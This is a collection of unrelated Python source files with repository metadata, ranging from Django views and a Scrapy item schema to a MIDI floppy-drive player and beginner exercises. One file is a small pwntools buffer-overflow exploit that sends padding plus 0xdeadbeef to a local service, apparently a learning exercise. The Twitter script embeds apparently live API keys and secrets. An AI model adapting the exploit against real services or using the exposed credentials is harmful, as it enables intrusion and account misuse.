raise MalformedMessage("Argument list must be rank-1 array.")
result = PyEvaluator(code, args, self).go().toJSONString()
Message(Message.EVALRET, result).send(self.outfile)
except Exception as e:
#raise
Message(Message.ERR, repr(e)).send(self.outfile)
finally:
setInterrupts(sig)
elif t==Message.DBGSerializationRoundTrip:
# this is a debug message. Deserialize the contents, print them to stdout, reserialize and send back
try:
print("Received data: ", message.data)
print("---------------")
aplarr = APLArray.fromJSONString(message.data)
serialized = aplarr.toJSONString()
print("Sending back: ", serialized)
print("---------------")
Message(Message.DBGSerializationRoundTrip, serialized).send(self.outfile)
except Exception as e:
Message(Message.ERR, repr(e)).send(self.outfile)
else:
Message(Message.ERR, "unknown message type #%d / data:%s"%(message.type,message.data)).send(self.outfile)
|
[
"marinuso@gmail.com"
] |
marinuso@gmail.com
|
5296914f31dfa648d606edcb432e60d48995d74f
|
e2bcf3a07829da38b494966c8392352f0f7c6ef6
|
/webcrawler/webcrawler/items.py
|
7345d1087cc1982f09ed9d716d2196705a7ccb44
|
[] |
no_license
|
abizerjafferjee/collegecondoalerts
|
d3875327b8b5d68c4c90bb9fb5fe7c5dad6a7ab7
|
f35324d0791c9198775b2d64eb0ef1767e3fa0be
|
refs/heads/master
| 2022-07-01T17:52:53.442506
| 2020-05-08T16:20:43
| 2020-05-08T16:20:43
| 260,981,659
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,255
|
py
|
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/items.html
import scrapy
class WebcrawlerItem(scrapy.Item):
    # define the fields for your item here like:
    # name = scrapy.Field()
    pass
class Places4StudentsListingItem(scrapy.Item):
    current_date = scrapy.Field()
    college_name = scrapy.Field()
    website = scrapy.Field()
    url = scrapy.Field()
    title = scrapy.Field()
    address = scrapy.Field()
    city = scrapy.Field()
    province = scrapy.Field()
    country = scrapy.Field()
    postal_code = scrapy.Field()
    type_of_accomodation = scrapy.Field()
    rental_rate = scrapy.Field()
    occupancy_date = scrapy.Field()
    lease_types = scrapy.Field()
    lease_conditions = scrapy.Field()
    tenant_information_required = scrapy.Field()
    num_washrooms = scrapy.Field()
    rental_information = scrapy.Field()
    occupied_by_landlord = scrapy.Field()
    landlord_name = scrapy.Field()
    landlord_telephone = scrapy.Field()
    floor_plans = scrapy.Field()
    distance = scrapy.Field()
    listing_description = scrapy.Field()
    utilities = scrapy.Field()
    amenities = scrapy.Field()
    image_links = scrapy.Field()
|
[
"abizerjafferjee@gmail.com"
] |
abizerjafferjee@gmail.com
|
ed3bb5fc994b6721597a9c7515168a964997ee84
|
1434aee6bf3beb1b36ecc010d8231e5d7c6f8b07
|
/01/dictionaries.py
|
89de86eec2f6e7bd6bf9cc3c1db4a619718eb682
|
[] |
no_license
|
elnazbkh/practice_python
|
5ddc9eb9389206be46b0fa79f8b327b6a418178c
|
a4ef032dc3a3e0803b9121d7fb975f066fc6e31e
|
refs/heads/master
| 2020-05-29T13:51:39.178216
| 2019-06-19T07:13:25
| 2019-06-19T07:13:25
| 189,176,036
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 393
|
py
|
#movie = ["sunlight", "woody allen", 2009,"yes", "no"]
movie ={"title":"sunlight", "director": "woody allen", "year": 2009, "answer": "yes"}
print(movie["title"])
#print(movie.clear())
print(movie.values())
print(movie.__len__())
print(movie.get("name"))
movie.update({"a": 1235, "b":585})
print(movie)
print(movie.get("writer", "unknown"))
print(movie.keys())
print(list(movie.keys()))
|
[
"elnaz.bakhtiari20@gmail.com"
] |
elnaz.bakhtiari20@gmail.com
|
aebafca48460fe335d6d580a522270231e3bb2af
|
3bb70650b4b83e4653dcc18c8233c106c7a5611a
|
/payment_type/views.py
|
208424481df08a022dc05541b289d53b7e328f55
|
[] |
no_license
|
khanhlu2013/pos_connect_code
|
48e736a6b1c5ca6a5c4ff39d842d8a93f66e67ef
|
fdf70de858c10b175832af31ecc0cf770d028396
|
refs/heads/master
| 2023-04-08T02:35:46.181265
| 2016-10-18T21:12:51
| 2016-10-18T21:12:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,952
|
py
|
from payment_type.models import Payment_type
from payment_type.payment_type_serializer import Payment_type_serializer
from django.http import HttpResponse
from django.core.serializers.json import DjangoJSONEncoder
import json
def payment_type_insert_view(request):
    pt = json.loads(request.POST['pt'])
    cur_login_store = request.session.get('cur_login_store')
    pt = Payment_type.objects.create(name=pt['name'],sort=pt['sort'],store_id=cur_login_store.id,active=pt['active'])
    pt_serialized = Payment_type_serializer(pt).data
    return HttpResponse(json.dumps(pt_serialized,cls=DjangoJSONEncoder), mimetype='application/json')
def payment_type_update_angular_view(request):
    pt_json = json.loads(request.POST['pt'])
    cur_login_store = request.session.get('cur_login_store')
    pt = Payment_type.objects.get(pk=pt_json['id'],store_id = cur_login_store.id)
    pt.name = pt_json['name']
    pt.sort = pt_json['sort']
    pt.active = pt_json['active']
    pt.save()
    pt_serialized = Payment_type_serializer(pt).data
    return HttpResponse(json.dumps(pt_serialized,cls=DjangoJSONEncoder), mimetype='application/json')
def payment_type_delete_view(request):
    id = request.POST['id']
    cur_login_store = request.session.get('cur_login_store')
    pt = Payment_type.objects.get(pk=id,store_id=cur_login_store.id)
    pt.delete()
    pt_lst = Payment_type.objects.filter(store_id=cur_login_store.id)
    pt_lst_serialized = Payment_type_serializer(pt_lst,many=True).data
    return HttpResponse(json.dumps(pt_lst_serialized,cls=DjangoJSONEncoder), mimetype='application/json')
def payment_type_get_view(request):
    cur_login_store = request.session.get('cur_login_store')
    pt_lst = Payment_type.objects.filter(store_id=cur_login_store.id)
    pt_lst_serialized = Payment_type_serializer(pt_lst,many=True).data
    return HttpResponse(json.dumps(pt_lst_serialized,cls=DjangoJSONEncoder), mimetype='application/json')
|
[
"khanhlu2013@gmail.com"
] |
khanhlu2013@gmail.com
|
3200279fcdb8a3178f8a843db5bccc368278b969
|
decdfe51291044e66c9fdaa4c7f1bc469d2627cd
|
/example/threshold_calcs.py
|
675ad6963d5ffbe3cefeffca71dd797d995b48b0
|
[] |
no_license
|
tomclose/mcmc_code
|
011435d191cbbf4635e493181283a3cb96bbf4c9
|
c3efde48e33c92564f3e8bd8a26e3820fb2649fe
|
refs/heads/master
| 2018-12-28T05:58:24.065898
| 2013-04-03T13:59:50
| 2013-04-03T13:59:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,620
|
py
|
import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'lib'))
import numpy as np
import state as st
import chain as ch
import getopt
def run_trials(size=6, prob=0.1, n_steps = 5000, n_trials = 1000, verbose=True):
    successes = failures = 0
    for i in range(n_trials):
        s_orig = st.UniformToricState(size, prob)
        s_orig.generate_errors()
        synd = s_orig.syndrome()
        # assume that logical horizontal/vertical errors
        # are independent ??, so that the overall threshold
        # is just the threshold for correcting one sort
        # of error
        vert_z = s_orig.VERT_Z
        vert_x = s_orig.VERT_X
        # forget the original error config
        s = st.UniformToricState.from_syndrome(size, prob, synd)
        conj_class = st.UniformToricState.compare(s, s_orig)
        # project onto the vertical error classes
        vert_class = conj_class & (vert_z + vert_x)
        p1 = ch.path(s.copy().change_class(vert_class))  # the right one
        p2 = ch.path(s.copy().change_class(vert_z ^ vert_class))
        p3 = ch.path(s.copy().change_class(vert_x ^ vert_class))
        p4 = ch.path(s.copy().change_class((vert_x + vert_z) ^ vert_class))
        paths = [p1, p2, p3, p4]
        ps = ch.path_set(*[ch.in_jumps_of(n_steps/2, ch.average_err(p)) for p in paths])
        # take two steps, so that the average is found
        # over the second half of the chain
        ps.next()
        res = ps.next()
        totals = [n for (n, prop, count) in res]
        if np.argmin(totals) == 0:
            successes += 1
            if verbose:
                print("success")
        else:
            failures += 1
            if verbose:
                print("fail")
    return (successes, failures)
if __name__ == "__main__":
    try:
        opts, args = getopt.getopt(sys.argv[1:], "s:n:p:L:v", ["steps=", "n_trials="])
    except getopt.GetoptError:
        usage = """
        Usage:
            python threshold_calcs.py -L 6 -p 0.3 --steps 1000 --n_trials 50
        """
        print(usage)
        sys.exit(2)
    # defaults:
    size, p, steps, n_trials, verbose = 6, 0.1, 1000, 20, False
    # from options:
    for opt, arg in opts:
        if opt == "-L":
            size = int(arg)
        elif opt in ("-s", "--steps"):
            steps = int(arg)
        elif opt in ("-n", "--n_trials"):
            n_trials = int(arg)
        elif opt == "-p":
            p = float(arg)
            print(p)
        elif opt == "-v":
            verbose = True
    print(run_trials(size, p, steps, n_trials, verbose=verbose))
|
[
"tom.close@cantab.net"
] |
tom.close@cantab.net
|
815be0e05f4238e38eed2ee4c71197dfb56b19a6
|
a498ca05c3c02a94713f8396a92ce3b979aef0cf
|
/DRF/src/libraryrest/views.py
|
938bcd888019086ef86d2f9657483af070fdbfe3
|
[] |
no_license
|
Sherlock5000/fullstack-toy-project
|
4404870366441dc35d2812d5ed9b373dd891b26f
|
5e559db07017a8c1e0bd11e459e14a27149ab2c4
|
refs/heads/main
| 2023-07-04T21:40:05.107701
| 2023-06-26T16:59:53
| 2023-06-26T16:59:53
| 386,567,491
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,284
|
py
|
# from django.shortcuts import render
from rest_framework.authentication import TokenAuthentication
from rest_framework.permissions import IsAuthenticated
from rest_framework import viewsets
from libraryrest.models import Customer, Order, Product, Tag
from libraryrest.serializers import CustomerSerializer, OrderSerializer,\
    ProductSerializer, TagSerializer
# Create your views here.
class CustomerViewSet(viewsets.ModelViewSet):
    serializer_class = CustomerSerializer
    queryset = Customer.objects.all()
    authentication_classes = [TokenAuthentication]
    permission_classes = [IsAuthenticated]
class TagViewSet(viewsets.ModelViewSet):
    serializer_class = TagSerializer
    queryset = Tag.objects.all()
    authentication_classes = [TokenAuthentication]
    permission_classes = [IsAuthenticated]
class ProductViewSet(viewsets.ModelViewSet):
    serializer_class = ProductSerializer
    queryset = Product.objects.all()
    authentication_classes = [TokenAuthentication]
    permission_classes = [IsAuthenticated]
class OrderViewSet(viewsets.ModelViewSet):
    serializer_class = OrderSerializer
    queryset = Order.objects.all()
    authentication_classes = [TokenAuthentication]
    permission_classes = [IsAuthenticated]
|
[
"anirban.das.16@mountblue.tech"
] |
anirban.das.16@mountblue.tech
|
882afb6438c7ec619724f5a3cc536e0417024e12
|
19181c269e51e381417dec4e2a0ac9ba06589efe
|
/Floppotron/Wii Shop.py
|
d3abb6918a4d2f1843864fad0ebd18bc6fd6fa41
|
[] |
no_license
|
SamueldSun/Floppotron
|
9bf2fd8c77efebc061ff506f0d761412d3999f82
|
f7a61c2bf3ae5940d5b4e09c33312dc7fda3fa12
|
refs/heads/master
| 2020-04-11T18:49:04.404170
| 2018-12-16T15:09:07
| 2018-12-16T15:09:07
| 162,012,564
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,723
|
py
|
hertz = [0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
31,
33,
35,
37,
39,
41,
44,
46,
49,
52,
55,
58,
62,
65,
69,
73,
78,
82,
87,
93,
98,
104,
110,
117,
123,
131,
139,
147,
156,
165,
175,
185,
196,
208,
220,
233,
247,
262,
277,
294,
311,
330,
349,
370,
392,
415,
440,
466,
494,
523,
554,
587,
622,
659,
698,
740,
784,
831,
880,
932,
988,
1047,
1109,
1175,
1245,
1319,
1397,
1480,
1568,
1661,
1760,
1865,
1976,
2093,
2217,
2349,
2489]
# Import stuff
from mido import MidiFile
import time
import serial
# Changing variables
ser = serial.Serial('COM4')
midiFile = 'Wii Channels - Mii Channel.mid'
# Other startup stuff
send = "\n"
time.sleep(3)
# Sends code to Arduino
def sendLine(code):
    print(int(code))
    ser.write(code.encode())
    ser.write(send.encode())
# Opens and reads Midi file
for msg in MidiFile(midiFile):
    time.sleep(msg.time)
    if not msg.is_meta:
        data = str(msg)
        # Filters out other initializing stuff
        if data[0:4] == "note":
            # If drive should turn on
            if data[6:7] == "n":
                if data[16] == "1":
                    code = ("3" + str(hertz[int(data[23:25])]) + "1")
                    sendLine(code)
                else:
                    code = ("2" + str(hertz[int(data[23:25])]) + "1")
                    sendLine(code)
            # If drive should turn off
            elif data[6:7] == "f":
                if data[17] == "1":
                    code = "30"
                    sendLine(code)
                else:
                    code = "20"
                    sendLine(code)
            # Else
            else:
                print("ERROR")
|
[
"noreply@github.com"
] |
SamueldSun.noreply@github.com
|
8479e2bf35b03e205eaeaef0584246e9b2d39146
|
cac694ea9a7f0cc918d9a3c91a76111657df8af6
|
/pwn_network.py
|
ac2d102e2fd9cec857cc91a37a916204e8ae81e4
|
[] |
no_license
|
NavKang/IntroToPwntools
|
c234936b50c9755a9ce1e15b65ba2807654a97f5
|
83c260795e26a8717814669887a84eb246aeae7f
|
refs/heads/main
| 2023-05-25T09:55:47.477011
| 2021-06-10T15:54:53
| 2021-06-10T15:54:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 173
|
py
|
from pwn import *
connect = remote('127.0.0.1', 1337)
print(connect.recvn(18))
payload = b"A" * 32  # use bytes so the padding can be concatenated with p32() output
payload += p32(0xdeadbeef)
connect.send(payload)
print(connect.recvn(34))
|
[
"noreply@github.com"
] |
NavKang.noreply@github.com
|
835e7636670509badbc31c10b573de3732f0f7e5
|
5fd76ed8167e4259524e2fddfaca3945de0a2e90
|
/covid19/covid19.py
|
904eeefa270dbbde4c8b9be90824079c69b926f3
|
[] |
no_license
|
davidjdclarke/scripts
|
87f71efadbfc873066541a23bc29f8d4044607aa
|
acea0b687b2b096e5781ed3fda7d5462d0381082
|
refs/heads/master
| 2023-04-28T12:35:33.239034
| 2021-05-20T21:54:17
| 2021-05-20T21:54:17
| 334,979,491
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,592
|
py
|
import pandas as pd
from matplotlib import pyplot as plt
def get_all_cases(data):
    data_keys = []
    for i in range(len(data)):
        if data[i] not in data_keys:
            data_keys.append(data[i])
    return data_keys
def percentage(death_numbers, prints=True):
    percent = (death_numbers['deaths'] / death_numbers['cases']) * 100
    if prints:
        print('Age Range: ' + str(age))
        print('Death Percentage: ' + str(percent) + '%')
    return percent
def numbers_by_range(age_range=0, print_statement=False):
    num_deaths = 0
    num_survivals = 0
    total = 0
    if age_range == 0:
        age_range = ['40s']
    for i in range(len(df["Age_Group"])):
        if df["Outcome1"][i] == 'Resolved' and df['Age_Group'][i] in age_range:
            num_survivals += 1
            total += 1
        elif df["Outcome1"][i] == 'Fatal' and df['Age_Group'][i] in age_range:
            num_deaths += 1
            total += 1
    if print_statement:
        print("Age Range: " + str(age_range))
        print('Total Cases: ' + str(total))
        print('Survived: ' + str(num_survivals))
        print('Deaths: ' + str(num_deaths))
    return {'deaths': num_deaths, 'cases': total, 'survivals': num_survivals, 'age_range': age_range}
def temp(df):
    dates = get_all_cases(df['Accurate_Episode_Date'])
    num_entries = len(dates)
    num_cases = len(df['Accurate_Episode_Date'])
    data = {'active_cases': [0]*num_entries, 'deaths': [], 'recoveries': [], 'total_deaths': [],
            'total_recoveries': [], 'total_cases': [], 'date': dates}
    active_id = []
    index = 0
    num_entries = len(df['Accurate_Episode_Date'])
    for i in range(len(data['date'])):
        if i > 0:
            data['active_cases'][i] = data['active_cases'][i-1]
        for j in range(num_cases):
            if df['Accurate_Episode_Date'][j] == data['date'][i]:
                data['active_cases'][i] += 1
        index += 1
        print(index)
        for case_id in active_id:
            if df['Test_Reported_Date'][case_id] == data['date'][i]:
                pass
                # data['active_cases'][i] -= 1
    return data
if __name__ == "__main__":
    df = pd.read_csv('conposcovidloc.csv')
    age_ranges = ['<20', '20s', '30s', '40s', '50s', '60s', '70s', '80s', '90s']
    data = {}
    '''for age in age_ranges:
        data[age] = numbers_by_range([age])
        percentage(data[age])
    data['total'] = numbers_by_range(age_ranges)'''
    '''info = df['Case_AcquisitionInfo']
    x = get_all_cases(info)'''
    x = temp(df)
|
[
"david.j.d.clarke@gmail.com"
] |
david.j.d.clarke@gmail.com
|
dcdc5eecf195e5435e2bd88a76d23087aa1ad8d9
|
04dcfaf382f90a7e6aee8f607f0379babb83e048
|
/twitterhw3b.py
|
1c0c14a32b597dc12a01bc895281c33bdf065784
|
[] |
no_license
|
malayshawhite2012/hw3
|
d2b152f7edbbfbf01d9832131e9e9a56a439d483
|
2d5629714c425b55487b5277143ec7d6d097367e
|
refs/heads/master
| 2021-01-11T07:35:06.998768
| 2016-11-15T01:59:50
| 2016-11-15T01:59:50
| 72,865,221
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,124
|
py
|
# In this assignment you must do a Twitter search on any term
# of your choice.
# Deliverables:
# 1) Print each tweet
# 2) Print the average subjectivity of the results
# 3) Print the average polarity of the results
# Be prepared to change the search term during demo.
import tweepy
from textblob import TextBlob
access_token = "784881409521508352-gq69a9kmOLNUwqEBudGxg31j5hj79DA"
access_token_secret = "9LjMj0AflSe1LTJ5IPK5Qs56jQSZSuJKFeAXbh8QlMRar"
consumer_key = "8n7r008VE7xn1IdUWl0rmDMsk"
consumer_secret = "YGDQT0DB4e75wTg99GRo5oIv1SpYNThM99jRepDReJFAtMOENP"
auth = tweepy.OAuthHandler(consumer_key,consumer_secret)
auth.set_access_token(access_token,access_token_secret)
api = tweepy.API(auth)
search_for_tweets = api.search('Hilary Clinton')
subjectivity = 0
polarity = 0
count = 0
for tweet in search_for_tweets:
    print(tweet.text)
    count += 1
    analysis = TextBlob(tweet.text)
    subjectivity += analysis.sentiment.subjectivity
    polarity += analysis.sentiment.polarity
print("\n")
print("The average subjectivity is " + str(subjectivity/count))
print("The average polarity is " + str(polarity/count))
|
[
"dajour@umich.edu"
] |
dajour@umich.edu
|
c71310117d5a77f30939815439c12d298add4716
|
a429fc499f463d2aa3390174f5db03928c7a7334
|
/account/migrations/0003_auto_20191009_1412.py
|
c25d4aeb4b3376fe3a1945762a60c5a742454e05
|
[] |
no_license
|
Junseok0211/FootballLover
|
29c4a3dd1a78a5d7d27d53bb318b3dc787d42c2f
|
817f7ea556dfa6a659cb7ebcd27f9e8c7aa35900
|
refs/heads/master
| 2022-12-10T02:28:32.800467
| 2020-04-28T17:09:25
| 2020-04-28T17:09:25
| 220,898,295
| 0
| 1
| null | 2022-12-08T06:15:27
| 2019-11-11T04:04:02
|
HTML
|
UTF-8
|
Python
| false
| false
| 406
|
py
|
# Generated by Django 2.1.8 on 2019-10-09 14:12
from django.db import migrations, models
class Migration(migrations.Migration):
    dependencies = [
        ('account', '0002_fnsuser_teamname'),
    ]
    operations = [
        migrations.AlterField(
            model_name='fnsuser',
            name='name',
            field=models.CharField(max_length=15, verbose_name='이름'),
        ),
    ]
|
[
"didwnstjr777@gmail.com"
] |
didwnstjr777@gmail.com
|
5386ed8a053aad896554efa4ec0fe332d49a55dd
|
e27295381be2b8d3bde601aea4954fa931c95176
|
/lesson4/monkey/hw/system.py
|
141dc4d05ff61e108a03afba213e4ecddff35f9a
|
[
"MIT"
] |
permissive
|
cnjllin/actual-16-homework
|
cd20f951ceaf956ead221ef5f756a0914b16cd8e
|
c4937af205dd7cee3ee39223f8b9271059e72d7e
|
refs/heads/master
| 2020-03-17T18:40:17.191245
| 2017-12-10T04:51:11
| 2017-12-10T04:51:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,063
|
py
|
#!coding: utf-8
import sys
import json
personinfos = []
def login(*args, **kwargs):
username = raw_input('Username: ')
password = raw_input('Password: ')
# check failed count; failed_count >= 3
if check_failed_count(username):
print 'disable username:%s login reboot system, failed count more than 3.' % username
return
# check username and password is ok
auth_result, ok = authentication(username, password)
if ok:
print "username:%s login sucess." % username
print '''
Welcome to reboot system.
'''
else:
add_failed_counter(username)
print "username:%s login failed, info:%s." % (username, auth_result)
def register(*args, **kwargs):
print '\n\tCreate your personal account\n'
username = raw_input('Username: ')
email = raw_input('Email Address: ')
password = raw_input('Password: ')
if check_user_exists(username):
print 'username : %s already exists.' % username, False
registerInfo = {'username' : username, 'email' : email, 'password' : password, 'failed_count' : 0}
personinfos.append(registerInfo)
print 'account %s is created sucess' % username, True
def add_failed_counter(username):
global personinfos
ret = []
for x in personinfos:
if x['username'] == username:
x['failed_count'] += 1
ret.append(x)
personinfos = ret
def check_failed_count(username):
map_user_failed_dic = { x['username'] : x['failed_count'] for x in personinfos if x }
if map_user_failed_dic[username] >= 3:
return True
return False
def save(*args, **kwargs):
try:
fd = open(args[0], 'w')
except Exception as e:
print "save data to file failed, info:%s." % e.args
else:
data = json.dumps(personinfos)
fd.write(data)
print "save data to file sucess."
finally:
fd.close()
def load(*args, **kwargs):
global personinfos
try:
fd = open(args[0], 'r')
except Exception as e:
print "load data to mem failed, info:%s" % e.args
return
else:
data = fd.read()
personinfos = json.loads(data)
print "load data to mem sucess."
fd.close()
def printFormat(*args, **kwargs):
if len(args) >= 1:
format = args[0]
else:
format = None
if format == "json":
print json.dumps(personinfos, indent=4)
elif format == "xml":
pass
elif format == "table":
'''
username | email | password | failed_count
monkey | monkey@51reboot.com | 123456 | 0
xiaoming | xiaoming@51reboot.com | 123456 | 0
'''
print "%-10s | %-24s | %-8s | %-8s" % ("username", 'email', 'password', 'failed_count')
for x in personinfos:
if not x:
continue
print "%-10s | %-24s | %-8s | %-8s" % (x['username'], x['email'], x['password'], x['failed_count'])
print "\n"
else:
print personinfos
def check_user_exists(username):
'''
user exists : return True
user not exists : return False
'''
usernames = [ x['username'] for x in personinfos if x ]
if username is usernames:
return True
else:
return False
def authentication(*args, **kwargs):
'''
If the username and password are verified successfully return True, otherwise return False
'''
map_user_pass_dic = { x['username'] : x['password'] for x in personinfos if x }
if map_user_pass_dic.get(args[0], None) == args[1]:
return 'login sucess.', True
else:
return 'bad password.', False
def help(*args, **kwargs):
docstring = '''
[[ reboot actual-16 ]]
login : login reboot system.
register : register account to reboot's system.
exit : exit reboot's system.
help : Print help info and exit successfully.
list : format account info.
exit : exit current program.
save : save data to file.
load : load data to mem.
'''
print docstring
def process_action(action):
action_slice = action.strip().split()
if len(action_slice) == 0:
action, args = '', ()
elif len(action_slice) >= 1:
action, args = action_slice[0] , action_slice[1:]
else:
action, args = action_slice[0] , ()
return action, args
def exit(*args, **kwargs):
sys.exit(0)
def main():
actionMap = {
'login' : login,
'register' : register,
'help' : help,
'exit' : exit,
'list' : printFormat,
'load' : load,
'save' : save,
}
help()
while True:
action = raw_input("please input your action: ")
action, args = process_action(action)
try:
actionMap[action](*args)
except Exception as e:
pass
if __name__ == '__main__':
main()
|
[
"zhengyscn@gmail.com"
] |
zhengyscn@gmail.com
|
6ec929b5a098d1c3ed743eca5d3183070a766f35
|
a8aa6570ad116f0ab6b059c4e2b68def88a47837
|
/Restaurants/restaurant_website/urls.py
|
5eff369a4f7569a6257bd7929ed83b2e854ba80d
|
[] |
no_license
|
omkumbhar/Restaurants
|
59eb9bd53a2061109119d5f7e224d4a02ee9ccb9
|
a1b1311de4e214b5dafedb7354a0700f436444d0
|
refs/heads/master
| 2022-04-23T14:45:47.584102
| 2020-04-24T17:16:31
| 2020-04-24T17:16:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 264
|
py
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.home, name = 'restaurant-home' ),
path('about/', views.about , name = 'restaurant-about' ),
#testing
path('login2/', views.login , name = 'restaurant-login' ),
]
|
[
"om.kumbhar1998@gmail.com"
] |
om.kumbhar1998@gmail.com
|
a61cc96f66da89971df0b310fea5e1c4c77d0380
|
0db97db08743783019efe022190f409d22ff95bd
|
/aliyun/api/rest/Mts20140618QuerySnapshotJobListRequest.py
|
a8644f1e42038e7be4e63081c0410bf482cc2082
|
[
"Apache-2.0"
] |
permissive
|
snowyxx/aliyun-python-demo
|
8052e2a165f1b869affe632dda484d6ca203bd9b
|
ed40887ddff440b85b77f9b2a1fcda11cca55c8b
|
refs/heads/master
| 2021-01-10T03:37:31.657793
| 2016-01-21T02:03:14
| 2016-01-21T02:03:14
| 49,921,095
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 350
|
py
|
'''
Created by auto_sdk on 2015.09.22
'''
from aliyun.api.base import RestApi
class Mts20140618QuerySnapshotJobListRequest(RestApi):
    def __init__(self,domain='mts.aliyuncs.com',port=80):
        RestApi.__init__(self,domain, port)
        self.SnapshotJobIds = None
    def getapiname(self):
        return 'mts.aliyuncs.com.QuerySnapshotJobList.2014-06-18'
|
[
"snowyxx@126.com"
] |
snowyxx@126.com
|
5c53baa76533a72c959d0164d038264dfa51729c
|
c91df3a07cc5cbf9a6a226d52173594de197e074
|
/enemy.py
|
a58333b108bb7ceef5b8b89f8a9460d3ecbbfde2
|
[] |
no_license
|
devu1999/mario-game
|
073e7cd15b6ae5940f77617174e504466754f6e7
|
824d62ae519d500fa6dbd6f0a06b19ae17caa6b1
|
refs/heads/master
| 2020-03-27T21:16:06.318149
| 2018-09-02T23:40:51
| 2018-09-02T23:40:51
| 147,129,834
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,950
|
py
|
import random
import sys,os
class enemy():
    def __init__(self,obj):
        self.x = 18
        self.y = random.randint(10,75)
        self.direction = 'R'
        self.char = []
        while( obj.Gamepad[self.x][self.y] != " " and obj.Gamepad[self.x + 1][self.y] != " "):
            self.y = random.randint(0,75)
    def Build(self,obj,Mario):
        self.char = ["0","|","/","\\"]
        for i in range(0,len(self.char)):
            self.char[i] = "\033[37m" + str(self.char[i]) + "\033[0m"
            if(obj.Gamepad[self.x][self.y] == self.char[i]):
                Mario.clearplayer(obj.Gamepad)
                return -1
        obj.Gamepad[self.x][self.y] = "^"
        obj.Gamepad[self.x + 1][self.y] = "T"
        return 1
    def clearenemy(self,obj):
        obj.Gamepad[self.x][self.y] = " "
        obj.Gamepad[self.x + 1][self.y] = " "
    def updatepos(self,obj):
        if(self.direction == "R"):
            if(obj.Gamepad[self.x][self.y + 1] != "\033[41;31m#\033[0m" and self.y <= 77):
                self.y += 1
            else:
                self.direction = "L"
            if(obj.Gamepad[self.x][self.y + 1] == "*"):
                return -1
        else:
            if(obj.Gamepad[self.x][self.y - 1] != "\033[41;31m#\033[0m" and self.y >= 1):
                self.y -= 1
            else:
                self.direction = "R"
            if(obj.Gamepad[self.x][self.y - 1] == "*"):
                return -1
        return 1
    def collision(self,Mario):
        if(Mario.headx - self.x < -1 and self.y >= Mario.heady - 1 and self.y <= Mario.heady + 1):
            return -1
        return 1
|
[
"devg1102@gmail.com"
] |
devg1102@gmail.com
|
139ce554357157ee605910b67a1ad2c43e74add6
|
d820c8efb25c9adb77015650a0f7dc6f1e983bfe
|
/abc/abc218_e.py
|
fcfc866e2728f903df05115cd96db8e7ca1c1c25
|
[] |
no_license
|
toshikish/atcoder
|
73fdaa2310f23f846279f9f7466bdb969448371f
|
33676630d6820dd92ccf0931425b8906b065bedd
|
refs/heads/master
| 2022-05-16T20:00:52.665762
| 2022-04-02T11:55:44
| 2022-04-02T11:55:44
| 173,099,510
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 863
|
py
|
N, M = map(int, input().split())
E = []
for _ in range(M):
Ai, Bi, Ci = map(int, input().split())
Ai -= 1
Bi -= 1
E.append((Ci, Ai, Bi))
E.sort()
class DisjointSet():
def __init__(self, n):
self.parent = list(range(n))
self.rank = [1] * n
def find(self, x):
if self.parent[x] == x:
return x
else:
self.parent[x] = self.find(self.parent[x])
return self.parent[x]
def unite(self, x, y):
x = self.find(x)
y = self.find(y)
if x == y:
return
if self.rank[x] > self.rank[y]:
x, y = y, x
self.parent[x] = y
self.rank[y] += self.rank[x]
ds = DisjointSet(N)
ans = 0
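# Kruskal-style sweep: process edges in increasing cost order; an edge whose
# endpoints are already connected is not needed for connectivity, so its
# (positive) cost can be collected into the answer.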
for ci, ai, bi in E:
if ds.find(ai) == ds.find(bi):
ans += max(ci, 0)
continue
ds.unite(ai, bi)
print(ans)
|
[
"toshiki@nanshika.com"
] |
toshiki@nanshika.com
|
d6df1d5232d2d55d87f21593517e5c6ff70ff91f
|
6ba163412b7868bbb5c872caf6172b44d1acf24e
|
/withPython_ch3.2_Matplotlib/3_8_plt_imshow.py
|
c8f173e79d1148925da8bd3ca08b6c69d1ea51b1
|
[] |
no_license
|
sejhig2/openCV_practice_StepByStep
|
6d6a238dcb389a89f68daa9b4f545f7021cb8170
|
5ad64a18cdf3202a2e4e060d5158dbef41927b64
|
refs/heads/main
| 2023-03-16T12:15:59.352848
| 2021-03-04T06:27:57
| 2021-03-04T06:27:57
| 343,457,609
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 195
|
py
|
import cv2
import matplotlib.pyplot as plt
img = cv2.imread("../python_openCV/img/girl.jpg")
plt.imshow(img)
plt.show()
# colors look wrong because OpenCV loads the image in BGR order
# BGR -> RGB [:,:,::-1]
|
[
"sejhig2@gmail.com"
] |
sejhig2@gmail.com
|
927571f2a97f9ca7dddd4aff0afa491e1db4f25a
|
e45f2c8e8327ca184c86f971df5a7792e75a26ed
|
/MobileShop/mobilestore/migrations/0001_initial.py
|
c892c96c4fc87fdc395f6575d3aa13e360caabbb
|
[] |
no_license
|
Shrayas1497/django
|
06bec848a80559b8e598bce23397e2603b0c7959
|
98a3ca5842877a3a433c63f4599a59a11f7dde4e
|
refs/heads/master
| 2020-06-19T20:06:49.337486
| 2019-07-14T15:49:17
| 2019-07-14T15:49:17
| 196,853,473
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 771
|
py
|
